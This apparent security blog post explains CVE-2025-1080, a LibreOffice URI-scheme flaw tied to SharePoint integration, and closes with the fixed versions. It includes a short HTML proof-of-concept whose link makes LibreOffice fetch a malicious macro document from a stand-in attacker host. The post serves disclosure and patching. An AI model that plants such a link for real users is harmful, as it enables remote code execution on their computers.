CVE-2025-1080 – Exploit in LibreOffice URI Scheme to Hijack MS SharePoint Server Integration

LibreOffice, the popular open-source office application suite, is affected by a critical security vulnerability that allows an attacker to execute arbitrary code on the victim’s computer. The security flaw, identified as CVE-2025-1080, originates from the way LibreOffice supports Office URI Schemes to enable browser integration with Microsoft SharePoint server.

This blog post outlines the details of the security issue, including the affected LibreOffice versions, and the way an attacker can exploit the vulnerability. Further, we provide a code snippet demonstrating the exploit, along with original references and links for further information.

Exploit Details

The exploit in question takes advantage of an additional URI scheme, 'vnd.libreoffice.command,' specific to LibreOffice, and targets the browser integration with Microsoft SharePoint server. An attacker could construct a malicious link in a browser using this scheme, embedding an inner URL.

When passed to LibreOffice, the inner URL can call internal macros with arbitrary arguments, leading to code execution and potential unauthorized access to sensitive information stored in LibreOffice documents.

Here is a sample code snippet demonstrating the exploit

<html>
  <head>
    <title>CVE-2025-1080 Exploit Demo</title>
  </head>
  <body>
    <h1>LibreOffice Exploit CVE-2025-1080</h1>
    <p>
      Click the link below to trigger the exploit:

      <a href="vnd.libreoffice.command:setHttpUrl?url=http://attacker.example.com/malicious_macro.odt">;
        Launch Exploit
      </a>
    </p>
  </body>
</html>

In this example, when a user clicks on the "Launch Exploit" link, the browser will send a request to LibreOffice to open a document from an attacker-controlled server, containing a malicious macro. Once the document is opened in LibreOffice, the malicious macro can execute arbitrary code on the victim's computer.

Original References

For further information and a deeper understanding of the CVE-2025-1080 vulnerability, we recommend consulting the following sources:

- LibreOffice Security Advisory
- National Vulnerability Database
- Security Tracker

Conclusion

CVE-2025-1080 is a critical security vulnerability in LibreOffice that has the potential for severe impacts on affected users and their systems. It exploits the way LibreOffice handles URI schemes to enable browser integration with Microsoft SharePoint server and allows an attacker to execute arbitrary code on the victim’s computer. Users are advised to mitigate this vulnerability by updating their LibreOffice installations to version 24.8.5 or 25.2.1, which have addressed this security issue.

Timeline

Published on: 03/04/2025 20:15:36 UTC